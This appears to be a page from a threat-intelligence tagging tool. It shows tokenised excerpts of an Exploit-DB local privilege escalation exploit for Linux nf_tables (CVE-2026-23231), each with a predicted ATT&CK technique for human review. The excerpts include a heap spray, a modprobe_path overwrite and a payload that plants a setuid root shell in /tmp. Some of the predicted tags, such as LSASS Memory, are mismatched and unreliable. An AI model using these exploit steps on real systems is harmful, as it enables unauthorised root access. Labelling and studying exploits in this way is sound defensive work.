← All stories

Exploit-DB

[local] Linux nf_tables 6.19.3 - Local Privilege Escalation

2 days ago · Read original ↗

ATT&CK techniques detected

13 predictions

T1068Exploitation for Privilege Escalation

98%

“[ local ] linux nf _ tables 6. 19. 3 - local privilege escalation linux nf _ tables 6. 19. 3 - local privilege escalation * exploit title : linux kernel 3. 16 – 6. 19. 3 nf _ tables rcu uaf lpe * cve : cve - 2026 - 23231 * date : 2026 - 03 - 19 * exploit author : aviral srivastav…”

Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.

No matches for .

Loading techniques…

T1068Exploitation for Privilege Escalation

92%

“ctx * ctx ) { info ( " step 6 : attempting privilege escalation... " ) ; ( void ) ctx ; / * * modprobe _ path overwrite technique : * * when the kernel encounters an unknown binary format, it calls * call _ usermodehelper ( ) with the path from the global variable * modprobe _ pa…”

Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.

No matches for .

Loading techniques…

T1027.001Binary Padding

87%

“sizeof ( struct nlattr ) + slen ; struct nlattr * nla = nl _ alloc ( b, total ) ; nla - > nla _ len = ( uint16 _ t ) ( sizeof ( struct nlattr ) + slen ) ; nla - > nla _ type = type ; memcpy ( ( char * ) ( nla + 1 ), s, slen ) ; } static void nl _ put _ u32 ( struct nl _ builder *…”

Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.

No matches for .

Loading techniques…

T1068Exploitation for Privilege Escalation

79%

“chain ( ) in * the packet path — can access the freed nft _ base _ chain memory. the * freed object ( ~ 224 bytes ) resides in kmalloc - 256 and can be reclaimed * with user - controlled spray objects ( msg _ msg via msgsnd ). * * the exploit races a chain dump against the uaf tr…”

Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.

No matches for .

Loading techniques…

T1059.004Unix Shell

73%

“. " ) ; fprintf ( stderr, " \ n " ) ; / * execute the suid shell * / char * argv [ ] = { " / tmp / rootsh ", " - p ", null } ; execv ( " / tmp / rootsh ", argv ) ; / * fallback if rootsh doesn ' t exist * / info ( " execv failed — check / tmp / rootsh manually " ) ; } else { / * …”

Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.

No matches for .

Loading techniques…

T1068Exploitation for Privilege Escalation

70%

“##118cf1159443250647533 * adds synchronize _ rcu ( ) between nft _ chain _ del ( ) and chain destroy. * * compilation : * gcc - wall - wextra - o exploit exploit. c - lpthread - static * * usage : * $. / exploit * [ * ] cve - 2026 - 23231 — linux nf _ tables rcu uaf lpe * [ * ] t…”

Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.

No matches for .

Loading techniques…

T1068Exploitation for Privilege Escalation

69%

“##443250647533 * [ 3 ] cve - 2024 - 1086 — nf _ tables double - free lpe ( technique reference ) * [ 4 ] cve - 2023 - 32233 — nf _ tables anonymous set uaf ( msg _ msg spray reference ) * * disclaimer : * this exploit targets an already patched vulnerability. it is provided * for…”

Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.

No matches for .

Loading techniques…

T1059.004Unix Shell

60%

“a memory - constrained environment " ) ; step _ cleanup ( & ctx ) ; return 1 ; } / * step 4 : spray * / ret = step _ spray ( & ctx ) ; if ( ret < 0 ) { fail ( " spray failed " ) ; step _ cleanup ( & ctx ) ; return 1 ; } / * step 5 : info leak * / ret = step _ leak ( & ctx ) ; if …”

Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.

No matches for .

Loading techniques…

T1055.001Dynamic-link Library Injection

48%

“##────────────────────────────────────────────── * / struct race _ ctx { int nfnl _ fd ; / * nfnetlink socket for operations * / int dump _ fd ; / * nfnetlink socket for dump * / struct spray _ state spray ; volatile int uaf _ triggered ; volatile int dump _ started ; volatile in…”

Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.

No matches for .

Loading techniques…

T1068Exploitation for Privilege Escalation

47%

“kernel * address ( 0xffff8880... ), we ' ve hit the uaf * and are reading from sprayed msg _ msg data. * / uint64 _ t handle _ be = _ _ builtin _ bswap64 ( handle ) ; if ( ( handle _ be & 0xffff000000000000ull ) = = 0xffff000000000000ull ) { ctx - > leaked _ addr = handle _ be ; …”

Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.

No matches for .

Loading techniques…

T1574.013KernelCallbackTable

44%

“kernel * address ( 0xffff8880... ), we ' ve hit the uaf * and are reading from sprayed msg _ msg data. * / uint64 _ t handle _ be = _ _ builtin _ bswap64 ( handle ) ; if ( ( handle _ be & 0xffff000000000000ull ) = = 0xffff000000000000ull ) { ctx - > leaked _ addr = handle _ be ; …”

Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.

No matches for .

Loading techniques…

T1003.001LSASS Memory

32%

“##────── * / static int step _ setup ( struct race _ ctx * ctx ) { info ( " step 1 : creating user / net namespace... " ) ; if ( setup _ namespace ( ) < 0 ) return - 1 ; ok ( " namespace created, cap _ net _ admin obtained " ) ; / * open nfnetlink sockets * / ctx - > nfnl _ fd = …”

Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.

No matches for .

Loading techniques…

T1059.004Unix Shell

31%

“payload ( void ) { file * f ; / * create the helper script that will be called as root * / f = fopen ( " / tmp / pwn ", " w " ) ; if (! f ) return - 1 ; fprintf ( f, " #! / bin / sh \ n " ) ; fprintf ( f, " / bin / cp / bin / sh / tmp / rootsh \ n " ) ; fprintf ( f, " / bin / chm…”

Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.

No matches for .

Loading techniques…

Summary

Linux nf_tables 6.19.3 - Local Privilege Escalation